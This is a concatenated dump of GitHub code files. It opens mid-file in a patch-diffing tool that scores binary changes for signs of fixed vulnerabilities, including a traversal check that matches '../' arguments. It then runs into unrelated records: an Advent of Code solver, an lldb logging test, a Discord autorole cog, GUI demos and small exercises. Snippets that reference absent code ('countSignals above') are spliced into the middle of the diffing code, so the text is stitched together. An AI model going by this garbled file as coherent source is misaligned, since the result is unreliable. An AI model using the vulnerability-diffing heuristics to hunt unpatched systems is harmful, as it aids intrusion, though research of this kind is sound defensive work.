= pe_obj.get_function_name(added_func[pe_index][0], False) # TODO: update to short format\n 
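# countSignals above has two likely bugs: Python's range(lo, hi) excludes hi
# (so a frequency equal to a filter's upper bound is dropped, assuming the
# bounds are meant to be inclusive), and duplicate frequencies inflate the
# Counter tally it compares against len(filterRanges). A set-intersection
# rewrite that sidesteps both:
def count_signals(frequencies, filter_ranges):
    passed = set(frequencies)
    for lo, hi in filter_ranges:
        passed = {f for f in passed if lo <= f <= hi}  # inclusive bounds
    return len(passed)

assert count_signals([8, 15, 4, 9], [(4, 10), (8, 15)]) == 2  # 8 and 9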
is_match_lock = reduce_function(function_name)\n if is_match_lock:\n change_calls = {\"before\": added_func[compare.compare.OLDEST][1],\n \"after\": added_func[compare.compare.NEWEST][1],\n \"address_before\": added_func[compare.compare.OLDEST][0],\n \"address_after\": added_func[compare.compare.NEWEST][0]\n }\n change_calls.update(kwargs)\n yield core.score.Score(base_score, feature_type,\n [compare_object.objects_to_compare[compare.compare.NEWEST]],\n [compare_object.objects_to_compare[compare.compare.OLDEST]],\n reason=function_name, type_of_change=type_of_change, **change_calls)\n\n\ndef score_mapping_replaced_functions(feature_type, compare_object, base_score, is_functions_are_interesting_replacing\n , **kwargs):\n xref_changes = compare_object.get_changed_called_functions(compare.compare.TypesOfChanges.REMOVED)\n xref_changes = xref_changes.union(compare_object.get_changed_called_functions(compare.compare.TypesOfChanges.ADDED))\n xref_changes = xref_changes.union(compare_object.get_changed_called_functions(compare.compare.TypesOfChanges.CHANGED))\n replaced_functions = detect_replaced_functions(xref_changes)\n new_pe_obj = compare_object.objects_to_compare[compare.compare.NEWEST].get_pe_obj()\n old_pe_obj = compare_object.objects_to_compare[compare.compare.OLDEST].get_pe_obj()\n for before_func, after_func, diff in replaced_functions:\n if before_func[0] is None or after_func[0] is None:\n raise ValueError(\"didn't expect to have mapping with None\")\n\n before_func_name = old_pe_obj[before_func[0]].function_name(True)\n after_func_name = new_pe_obj[after_func[0]].function_name(True)\n\n is_interesting_replacement = is_functions_are_interesting_replacing(old_pe_obj[before_func[0]].function_name(False),\n new_pe_obj[after_func[0]].function_name(False))\n if is_interesting_replacement:\n change_calls = {\"name_before\": before_func_name,\n \"name_after\": after_func_name,\n \"before\": before_func[1],\n \"after\": after_func[1],\n \"diff\": diff,\n \"address_before\": before_func[0],\n \"address_after\": after_func[0]}\n score = base_score\n if type(is_interesting_replacement) == int:\n score = base_score + (is_interesting_replacement / 4)\n\n change_calls.update(kwargs)\n yield core.score.Score(score, feature_type,\n [compare_object.objects_to_compare[compare.compare.NEWEST]],\n [compare_object.objects_to_compare[compare.compare.OLDEST]],\n type_of_change=compare.compare.TypesOfChanges.CHANGED,\n **change_calls)\n\n\ndef detect_replaced_functions(function_calls):\n \"\"\"\n\n :param function_calls: list of tuples ((address old (int), number of xrefs before(int)), (address_new(int), number_of_xrefs (int)))\n :return: list of tuples (function_call, function_call)\n \"\"\"\n added = {}\n removed = {}\n for function_call_before, function_call_after in function_calls:\n before = function_call_before[1]\n after = function_call_after[1]\n diff = after - before\n\n chosen_dict = added\n chosen_call = function_call_after\n if diff < 0:\n chosen_dict = removed\n chosen_call = function_call_before\n\n if diff not in chosen_dict:\n chosen_dict[diff] = []\n\n if chosen_call[0] is None: # no function address\n continue\n\n chosen_dict[diff].append(chosen_call)\n\n swapped = []\n for diff, added_funcs in added.items():\n if diff <= 0: # we're going to ignore no changes or negative change (to reduce double mapping)\n continue\n for added_func in added_funcs:\n replaced_functions = removed.get(-diff, [])\n for old_fun in replaced_functions:\n swapped.append([old_fun, added_func, diff])\n\n return 
swapped\n\n\n# ################################ Features from known list ###############################################\n\nclass XrefVulnerableFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"XrefVulnerableFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 50, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 50, compare.compare.OLDEST)\n ]\n for score in score_xref_function_name(type(self), compare_object, scores,\n naming_parsing.is_name_known_vulnerable_func):\n yield score\n\n\nclass XrefLogicalVulnerableFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"XrefLogicalVulnerableFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 50, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 25, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_known_logical_vulnerable_func):\n yield score\n\n\nclass LogicalVulnerableFixup(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"LogicalVulnerableFixup\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 40, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 70, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n\n for score in score_xref_function_name(type(self), compare_object, scores,\n naming_parsing.is_function_is_fixup):\n yield score\n\n\nclass StrSafeFunction(features.feature.SimpleFunctionFeature):\n # https://docs.microsoft.com/en-us/windows/win32/api/strsafe/\n # https://www.defcon.org/images/defcon-18/dc-18-presentations/Oh/DEFCON-18-Oh-Exploit-Spotting.pdf\n METHOD_NAME = \"StrSafeFunction\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 10, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 30, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, -5, compare.compare.OLDEST)\n ]\n\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_is_strsafe_function):\n yield score\n\n\nclass IntSafeFunctions(features.feature.SimpleFunctionFeature):\n # int_safe_functions should be inline but inline (recommended to the compiler) we might catch that.\n METHOD_NAME = \"IntSafeFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 40, compare.compare.NEWEST),\n ]\n\n # TODO: add overflow/underflow CWE score.\n for score in score_xref_function_name(type(self), compare_object, scores,\n 
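# detect_replaced_functions above pairs call-count increases with
# equal-magnitude decreases to guess that one callee replaced another
# (e.g. strcpy -> strcpy_s). The bucketing idea in miniature; names are
# illustrative, not the record's API:
from collections import defaultdict

def pair_by_delta(deltas):
    # deltas: list of (name, xref_count_change); yields (removed, added) pairs
    gained, lost = defaultdict(list), defaultdict(list)
    for name, d in deltas:
        (gained if d > 0 else lost)[abs(d)].append(name)
    return [(old, new)
            for d, news in gained.items()
            for new in news
            for old in lost.get(d, [])]

assert pair_by_delta([("strcpy", -3), ("strcpy_s", 3)]) == [("strcpy", "strcpy_s")]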
features.function_features.naming_parsing.is_name_is_int_safe_functions):\n yield score\n\n\nclass DeprecatedFunctions(features.feature.SimpleFunctionFeature):\n # https://docs.microsoft.com/en-us/previous-versions/windows/desktop/legacy/jj635743(v=vs.85)\n METHOD_NAME = \"DeprecatedFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, -5, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 30, compare.compare.OLDEST)\n ]\n\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_function_is_deprecated):\n yield score\n\n# ###################### by parsing the name ############################\n\n\nclass XrefLockFunction(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"XrefLockFunction\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 30, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 5, compare.compare.OLDEST)\n ]\n for score in score_xref_function_name(type(self), compare_object, scores,\n naming_parsing.is_name_related_to_sync,\n relevant_cwes=[411]):\n yield score\n\n\nclass FreeFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"FreeFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n\n # TODO: add CWE score.\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_related_memory_free):\n yield score\n\n\nclass AllocFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"AllocFunctions\"\n\n def __init__(self):\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n scores = [(compare.compare.TypesOfChanges.CHANGED, 20, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.ADDED, 15, compare.compare.NEWEST),\n (compare.compare.TypesOfChanges.REMOVED, 10, compare.compare.OLDEST)\n ]\n\n # TODO: add CWE score.\n for score in score_xref_function_name(type(self), compare_object, scores,\n features.function_features.naming_parsing.is_name_related_memory_allocation):\n yield score\n\n\n# ########################### Mappings #############################################\n\n\nclass ReplacedLogicalFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"ReplacedLogicalFunctions\"\n\n def __init__(self):\n \"\"\"\n Looks for functions replaced from PathCombine to PathCchCombine\n \"\"\"\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n base_score = 75\n for score in score_mapping_replaced_functions(type(self), compare_object, base_score,\n features.function_features.naming_parsing.replaced_logical_vulnerable_function):\n yield score\n\n\nclass 
ReplacedVulnerableFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"ReplacedVulnerableFunctions\"\n\n def __init__(self):\n \"\"\"\n looks for functions such as strcmp to strcmp_s\n \"\"\"\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n base_score = 70\n for score in score_mapping_replaced_functions(type(self), compare_object, base_score,\n features.function_features.naming_parsing.replaced_vulnerable_function):\n yield score\n\n\nclass ReplacedSimilarFunctions(features.feature.SimpleFunctionFeature):\n METHOD_NAME = \"ReplacedSimilarFunctions\"\n\n def __init__(self):\n \"\"\"\n looks for functions with a similar name (not known functions )\n \"\"\"\n super().__init__(type(self).METHOD_NAME, compare.compare.TypesOfChanges.CHANGED)\n\n def _score(self, compare_object):\n base_score = 40\n for score in score_mapping_replaced_functions(type(self), compare_object, base_score,\n features.function_features.naming_parsing.replaced_similar_functions):\n yield score\n \n\nclass DirectoryTraversal(features.feature.FunctionFeature):\n METHOD_NAME = \"DirectoryTraversal\"\n\n def __init__(self):\n number_of_compared_objects = 2\n self.compatible_functions = [\"wcsstr\", \"strstr\", \"StrStrIW\"]\n changes = [compare.compare.TypesOfChanges.CHANGED, compare.compare.TypesOfChanges.ADDED]\n group_by = features.groupby.GroupByChangedFunctions(number_of_compared_objects,\n get_changes=lambda x: x.get_multiple_changes(changes))\n super().__init__(type(self).METHOD_NAME, number_of_compared_objects, group_by)\n\n def is_compatible_func(self, found_function_name):\n for referenced_func_name in self.compatible_functions:\n if features.function_features.naming_parsing.compare_names(found_function_name, referenced_func_name, False):\n return True\n return False\n\n def _score(self, compare_object):\n func_obj = compare_object.objects_to_compare[compare.compare.NEWEST]\n if func_obj is None:\n return\n\n called_funcs = func_obj.get_arguments_called_functions()\n for ea, function_calls in called_funcs.items():\n for function_call in function_calls:\n isEquals = self.is_compatible_func(function_call['name'])\n if isEquals:\n args = features.function_features.changed_constants.extract_const_from_function_call(function_call)\n for arg in args:\n if arg is not None and (\"../\" == arg or \"..\\\\\"==arg):\n yield core.score.Score(80, type(self), [func_obj], type_of_change=compare_object.type_of_change, arg=\"../\", args=args)\n else:\n yield core.score.Score(5, type(self), [func_obj], type_of_change=compare_object.type_of_change, args=args)\n","repo_name":"SafeBreach-Labs/Back2TheFuture","sub_path":"features/function_features/xrefs.py","file_name":"xrefs.py","file_ext":"py","file_size_in_byte":16863,"program_lang":"python","lang":"en","doc_type":"code","stars":157,"dataset":"github-code","pt":"66"} +{"seq_id":"18647356133","text":"rom = list(map(str.rstrip, open('d8.txt')))\n\ndef run(rom, patch):\n pc = 0\n a = 0\n nsteps = 0\n while pc < len(rom) and nsteps < len(rom):\n nsteps += 1\n op, arg = rom[pc].split(' '); arg = int(arg)\n if pc == patch:\n if op == 'jmp': op = 'nop'\n elif op == 'nop': op = 'jmp'\n # print(f'{pc:4} ({a:3}): {op} {arg}')\n if op == 'acc':\n a += arg\n pc += 1\n elif op == 'jmp':\n pc += arg\n continue\n elif op == 'nop':\n pc += 1\n\n return pc == len(rom), a\n\nfor cur_pc, line in enumerate(rom):\n terminated, a = run(rom, patch=cur_pc)\n if terminated:\n print(f'found {cur_pc} {a}')\n 
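# run() above bounds execution at len(rom) steps, which happens to suffice
# for this instruction set because a terminating run never revisits an
# instruction; an explicit visited set states the halting check directly.
# A compact sketch of that variant:
def halts(rom):
    pc, acc, seen = 0, 0, set()
    while pc < len(rom):
        if pc in seen:
            return False, acc          # revisited an instruction: loop
        seen.add(pc)
        op, arg = rom[pc].split()
        acc += int(arg) if op == "acc" else 0
        pc += int(arg) if op == "jmp" else 1
    return True, acc                   # ran off the end: terminated

assert halts(["nop +0", "acc +1", "jmp +1"]) == (True, 1)
assert halts(["jmp +0"]) == (False, 0)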
break","repo_name":"jogloran/advent-of-code-2020","sub_path":"d8b.py","file_name":"d8b.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"5747337247","text":"import functools\nimport inspect\n\nimport cocotb\n\nfrom pyuvm import uvm_root\n\n\ndef test(\n timeout_time=None,\n timeout_unit=\"step\",\n expect_fail=False,\n expect_error=(),\n skip=False,\n stage=None,\n):\n version_info = tuple(int(n) for n in cocotb.__version__.split(\".\"))\n if version_info >= (1, 7, 0) and stage is None:\n stage = 0\n\n def decorator(cls):\n\n # create cocotb.test object to be picked up RegressionManager\n @cocotb.test(\n timeout_time=timeout_time,\n timeout_unit=timeout_unit,\n expect_fail=expect_fail,\n expect_error=expect_error,\n skip=skip,\n stage=stage,\n )\n @functools.wraps(cls)\n async def test(_):\n await uvm_root().run_test(cls)\n\n # adds cocotb.test object to caller's module\n caller_frame = inspect.stack()[1]\n caller_module = inspect.getmodule(caller_frame[0])\n setattr(caller_module, f\"test_{test._id}\", test)\n\n # returns decorator class unmodified\n return cls\n\n return decorator\n","repo_name":"georgereuben/RTL-Project","sub_path":"pyuvm-master/pyuvm/extension_classes.py","file_name":"extension_classes.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27392177532","text":"from . import ProcessFunctionsTestCase\nfrom src.longhorn.config import TestingConfig\nfrom src.longhorn.process.process_functions import Process\n\n\nclass CreateProcessTestCase(ProcessFunctionsTestCase):\n def test_create_process_creates_process(self):\n test_process = Process(\n self.event_text,\n TestingConfig.PROCESS_FILE,\n TestingConfig.PROCESS_TTL,\n _ut=True,\n )\n test_process.create_process()\n with open(TestingConfig.PROCESS_FILE, \"rt\") as process_file:\n self.assertIn(test_process.process_id, process_file.read())\n test_process.delete_process()\n","repo_name":"WhaleJ84/longhorn","sub_path":"test/test_process/test_create_process.py","file_name":"test_create_process.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"35790812071","text":"\"\"\"IRC log file format definitions.\"\"\"\n# pylint: disable=invalid-name,line-too-long\n\n\nfrom __future__ import (absolute_import, division,\n print_function, unicode_literals)\nfrom builtins import *\n\nimport re\n\n\ndef c(regex):\n \"\"\"A convenience alias for anchoring and compiling *regex*.\"\"\"\n return re.compile(r'^{}$'.format(regex))\n\n\n#: A dict mapping supported formats to their rules.\nformats = {\n 'omnipresence': {\n 'line': c(r'\\[(?P.*?)\\] (?P.*)'),\n 'timestamp': '%d-%b-%Y %H:%M:%S',\n 'privmsg': c(r'<(?P.*?)> (?P.*)'),\n 'action': c(r'\\* (?P.*?) (?P.*)'),\n 'notice': c(r'-(?P.*?)- (?P.*)'),\n 'nick': c(r'\\*\\*\\* (?P.*?) is now known as (?P.*?)'),\n 'join': c(r'\\*\\*\\* (?P.*?) <(?P.*?)> has joined (?P.*?)'),\n 'part': c(r'\\*\\*\\* (?P.*?) <(?P.*?)> has left (?P.*?)'),\n 'quit': c(r'\\*\\*\\* (?P.*?) <(?P.*?)> has quit IRC(?: \\((?P.*?)\\))?'),\n 'kick': c(r'\\*\\*\\* (?P.*?) was kicked by (?P.*?)(?: \\((?P.*?)\\))?'),\n 'topic': c(r'\\*\\*\\* (?P.*?) changes topic to (?P.*?)'),\n 'mode': c(r'\\*\\*\\* (?P.*?) 
sets mode: (?P<mode>.*?)'),\n },\n}\n","repo_name":"kxz/interstat","sub_path":"interstat/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21809066465","text":"# So a generator function returns a generator object that is iterable, i.e., it can be used as an iterator.\n\ndef giveNumbers():\n yield 1\n yield 2\n yield 3\n yield 4\n\n\nfor x in giveNumbers():\n print(x)","repo_name":"halfozone007/repoA","sub_path":"PythonProjects/QuickStart/6Generator.py","file_name":"6Generator.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11618458689","text":"\"\"\"\nTest lldb logging. This test just makes sure logging doesn't crash, and produces some output.\n\"\"\"\n\n\nimport os\nimport lldb\nfrom lldbsuite.test.decorators import *\nfrom lldbsuite.test.lldbtest import *\nfrom lldbsuite.test import lldbutil\n\n\nclass LogTestCase(TestBase):\n NO_DEBUG_INFO_TESTCASE = True\n\n def setUp(self):\n super(LogTestCase, self).setUp()\n self.log_file = self.getBuildArtifact(\"log-file.txt\")\n\n def test_file_writing(self):\n self.build()\n exe = self.getBuildArtifact(\"a.out\")\n self.expect(\"file \" + exe, patterns=[\"Current executable set to .*a.out\"])\n\n if os.path.exists(self.log_file):\n os.remove(self.log_file)\n\n # By default, Debugger::EnableLog() will set log options to\n # PREPEND_THREAD_NAME + OPTION_THREADSAFE. We don't want the\n # threadnames here, so we enable just threadsafe (-t).\n self.runCmd(\"log enable -f '%s' lldb commands\" % (self.log_file))\n\n self.runCmd(\"command alias bp breakpoint\")\n\n self.runCmd(\"bp set -n main\")\n\n self.runCmd(\"bp l\")\n\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n\n with open(self.log_file, \"r\") as f:\n log_lines = f.read()\n os.remove(self.log_file)\n\n self.assertGreater(len(log_lines), 0, \"Something was written to the log file.\")\n\n # Check that lldb truncates its log files\n def test_log_truncate(self):\n # put something in our log file\n with open(self.log_file, \"w\") as f:\n for i in range(1, 1000):\n f.write(\"bacon\\n\")\n\n self.runCmd(\"log enable -f '%s' lldb commands\" % self.log_file)\n self.runCmd(\"help log\")\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n with open(self.log_file, \"r\") as f:\n contents = f.read()\n\n # check that it got removed\n self.assertEquals(contents.find(\"bacon\"), -1)\n\n # Check that lldb can append to a log file\n def test_log_append(self):\n # put something in our log file\n with open(self.log_file, \"w\") as f:\n f.write(\"bacon\\n\")\n\n self.runCmd(\"log enable -a -f '%s' lldb commands\" % self.log_file)\n self.runCmd(\"help log\")\n self.runCmd(\"log disable lldb\")\n\n self.assertTrue(os.path.isfile(self.log_file))\n with open(self.log_file, \"r\") as f:\n contents = f.read()\n\n # check that it is still there\n self.assertEquals(contents.find(\"bacon\"), 0)\n\n # Enable all log options and check that nothing crashes.\n @skipIfWindows\n def test_all_log_options(self):\n if os.path.exists(self.log_file):\n os.remove(self.log_file)\n\n self.runCmd(\n \"log enable -v -s -T -p -n -S -F -f '%s' lldb commands\" % self.log_file\n )\n self.runCmd(\"help log\")\n self.runCmd(\"log disable lldb\")\n\n 
self.assertTrue(os.path.isfile(self.log_file))\n","repo_name":"llvm/llvm-project","sub_path":"lldb/test/API/commands/log/basic/TestLogging.py","file_name":"TestLogging.py","file_ext":"py","file_size_in_byte":2997,"program_lang":"python","lang":"en","doc_type":"code","stars":22888,"dataset":"github-code","pt":"66"} +{"seq_id":"8419852395","text":"from __future__ import annotations\n\nfrom typing import TYPE_CHECKING\n\nimport discord\nfrom asyncpg import UniqueViolationError\nfrom discord import app_commands, Interaction, Role\nfrom src.features.autorole.services import convert_schemas_to_role_objects\n\nfrom src.features.autorole.ui import ConfirmSyncModal\n\nif TYPE_CHECKING:\n from src.bot import AmeliaBot\n\n \nclass AutoRoleConfig(app_commands.Group):\n def __init__(self, bot: AmeliaBot):\n super().__init__(\n name='autorole',\n description='Configuration commands for AutoRole'\n )\n self.bot = bot\n\n @app_commands.command(\n name='add-role', \n description='Adds a role that will automatically be assigned on member join'\n )\n @app_commands.describe(role=\"The role to auto-assign\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def add_auto_role(self, itx: Interaction, role: Role):\n assert itx.guild_id is not None\n async with self.bot.db as session:\n await session.auto_roles.add_auto_role(itx.guild_id, role.id)\n await session.commit()\n response = f\"{role.name} Added to auto roles. Note that this will not sync automatically. To sync,\" \\\n f\"please run the sync command specifically\"\n await itx.response.send_message(response, ephemeral=True)\n\n @add_auto_role.error\n async def on_add_error(self, itx: Interaction, error: app_commands.AppCommandError):\n unwrapped_error = error.original if isinstance(error, app_commands.errors.CommandInvokeError) else error\n if isinstance(unwrapped_error, UniqueViolationError):\n await itx.response.send_message(\"This role is already added.\", ephemeral=True)\n else:\n await itx.response.send_message(\"Role not added. 
Unknown error\", ephemeral=True)\n raise error\n\n @app_commands.command(name='remove-role', description=\"Removes a role from automatically assigning to new members\")\n @app_commands.describe(role=\"The role to unassign\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def remove_autorole(self, itx: Interaction, role: discord.Role):\n async with self.bot.db as session:\n await session.auto_roles.remove_auto_role(role.id)\n await session.commit()\n await itx.response.send_message(f\"{role.name} is no longer an auto-role\", ephemeral=True)\n\n @app_commands.command(name='list-roles', description=\"Lists the roles that are set to automatically assign\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def list_autorole(self, itx: Interaction):\n assert itx.guild is not None\n async with self.bot.db as session:\n schemas = await session.auto_roles.guild_auto_roles(itx.guild.id)\n roles = convert_schemas_to_role_objects(itx.guild, schemas)\n names = '\\n'.join(r and r.mention for r in roles) or 'No Roles'\n embed = discord.Embed(title=\"Auto-Roles\", description=names)\n await itx.response.send_message(embed=embed, ephemeral=True)\n\n @app_commands.command(name='sync', description=\"Sync all auto-roles to members in the guild\")\n @app_commands.checks.has_permissions(manage_roles=True)\n async def sync(self, itx: Interaction):\n await itx.response.send_modal(ConfirmSyncModal(self))","repo_name":"dfitzpatrick/amelia","sub_path":"src/features/autorole/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3353,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"66"} +{"seq_id":"20386761103","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Sep 20 16:00:22 2016\n\n@author: rod\n\nDescription:\nAssume s is a string of lower case characters.\n\nWrite a program that counts up the number of vowels contained in the string s. \nValid vowels are: 'a', 'e', 'i', 'o', and 'u'. \nFor example, if s = 'azcbobobegghakl', your program should print:\nNumber of vowels: 5\n\"\"\"\ns = 'azcbobobegghakl'\ncount = 0\nx = s.lower()\nvowels = {\"a\", \"e\", \"i\", \"o\", \"u\"}\nfor letter in x:\n if letter in vowels:\n count +=1\nprint(\"Number of vowels: \" + str(count))","repo_name":"StudentOfJS/MITx6.0","sub_path":"ps1-problem1.py","file_name":"ps1-problem1.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4301169038","text":"from tkinter import *\r\nfrom PIL import ImageTk, Image\r\n\r\nroot = Tk()\r\nroot.geometry(\"1920x1080\")\r\nroot.title(\"NCT 1 Times\")\r\nNewspaperName= Label(text=\"NCT 1 Times\", font=(\"Times New Roman\", 50, \"bold\"), bg=\"grey\",borderwidth= 5, relief=RIDGE)\r\nNewspaperName.pack(side=TOP, fill=X)\r\n\r\nimg1 = ImageTk.PhotoImage(Image.open(\"1.jpg\"))\r\nimg1_label=Label(image=img1)\r\nimg1_label.pack(side=LEFT, anchor=\"nw\", padx=200)\r\n\r\ntxt1= Label(text='''Text messaging, or texting, is the act of composing and sending electronic messages, typically consisting \\nof alphabetic and numeric characters, between two or more users of mobile devices, desktops/laptops, or \\nanother type of compatible computer. Text messages may be sent over a cellular network, or may also be\\n sent via an Internet connection. 
The term originally referred to messages sent using the Short Message \\nService (SMS).''', font=(\"Times New Roman\", 12))\r\ntxt1.pack(side=LEFT, anchor=\"w\")\r\n\r\n\r\n\r\n\r\n\r\n\r\nroot.mainloop()","repo_name":"abhoygorai/MyLearning","sub_path":"Tkinter/Newspaper.py","file_name":"Newspaper.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37560065489","text":"import sqlite3\nfrom .filesys import exRm\n\nclass DatabaseManager(object):\n def __init__(self, db, remove):\n dbFname = db+'.db'\n self.sqlFile = None\n if remove:\n exRm(dbFname)\n self.conn = sqlite3.connect(dbFname)\n self.conn.text_factory = str\n self.conn.row_factory = lambda cursor, row: row[0]\n self.conn.execute('pragma foreign_keys = on')\n self.conn.commit()\n self.cur = self.conn.cursor()\n\n def readSql(self,file):\n self.instF = open(file,'r')\n self.instSQL = ''\n for l in self.instF:\n self.instSQL = self.instSQL+l\n return self.instSQL\n\n def query(self,q,fo=False):\n if q.count(';') > 1:\n self.cur.executescript(q)\n elif q.count(';') <= 1 and fo == False:\n self.cur.execute(q)\n else:\n self.foq = self.cur.execute(q)\n self.conn.commit()\n return self.foq.fetchone() if fo else list(self.cur)\n\n def index(self,tableName,field):\n iQuery = \"\"\n for i in field:\n idxQuery = \"CREATE INDEX idx_\"+i+\"_\"+tableName+\" ON \"+tableName+\" (\"+i+\" ASC);\"\n iQuery = iQuery + idxQuery+'\\n'\n iQuery = iQuery[:-1]\n self.query(iQuery)\n return iQuery\n\n def nullValue(self,string,is_int=False):\n if string=='':\n return 'NULL'\n elif string !='' and is_int==False:\n return '\\''+str(string)+'\\''\n elif string !='' and is_int==True:\n return string\n\n def sqlQuotes(self,string):\n return string.replace(\"'\",\"''\")\n \n\n def __del__(self):\n self.conn.close()\n","repo_name":"Myst3ri0n/reddit-save-saved","sub_path":"gcore/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"8912875450","text":"import PySimpleGUI as s\r\nimport file\r\n\r\n\r\nlist = []\r\ndone = []\r\nlist = file.readFile()\r\ndone = file.readCompleted()\r\nlayout = [[s.Text(\"TODO LIST \")],[s.Text(\"New Event : \"),s.InputText(\"\",key = \"data\")],\r\n [s.CalendarButton(\"Choose Date\", target=\"dispDate\", key='date'),s.InputText(\"\",key = \"dispDate\", disabled=True ,do_not_clear=False)],\r\n [s.Text(\"LIST : \"), s.Listbox(values=list,key = \"list\",size=(40,6), enable_events=True), s.Text(\"FINISHED : \"), s.Listbox(values=done,key = \"complete\",size=(40,6), enable_events=True)],\r\n [s.Slider(range=(10,1,-1),default_value=1,orientation=\"horizontal\",key=\"priority\")],\r\n [s.Button(\"add\"),s.Button(\"delete\"),s.Button(\"prioritize\"),s.Button(\"finished\")],\r\n [s.Text(\"\", auto_size_text=False, key=\"tell\")]]\r\n\r\nwindow = s.Window(\"my first GUI \", layout)\r\n\r\nwhile True:\r\n event, value = window.Read()\r\n if (event == \"add\"):\r\n if(value[\"dispDate\"] == \"\"):\r\n window.Element(\"error\").Update(\"Please input a date\")\r\n continue\r\n if (value[\"data\"] == \"\"):\r\n window.Element(\"error\").Update(\"Please enter a value\")\r\n continue\r\n\r\n x = value[\"data\"]+\" \"+value[\"dispDate\"]+\" \"+str(int(value[\"priority\"]))\r\n list.append(x)\r\n window.FindElement(\"list\").Update(list)\r\n window.Element(\"tell\").Update(\"entry added\")\r\n file.writeFile(list) 
